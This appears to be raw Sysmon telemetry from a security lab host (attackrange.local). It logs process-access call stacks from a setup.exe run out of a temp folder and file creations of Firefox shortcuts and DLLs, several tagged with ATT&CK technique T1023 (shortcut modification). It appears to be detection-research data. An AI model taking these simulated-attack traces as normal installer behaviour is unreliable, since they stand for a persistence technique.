13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 11241100x800000000000000016366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\Public\Desktop\Firefox.lnk2021-01-18 13:59:53.396 11241100x800000000000000016365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT10232021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk~RF17d9a6.TMP2021-01-18 13:59:53.396 11241100x800000000000000016364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT10232021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\~irefox.tmp2021-01-18 13:59:53.396 11241100x800000000000000016363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ApplicationID.dll2021-01-18 13:59:53.380 10341000x800000000000000016362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64) 10341000x800000000000000016359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64) 10341000x800000000000000016355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 11241100x800000000000000016354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT10232021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk2021-01-18 13:59:53.380 10341000x800000000000000016353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 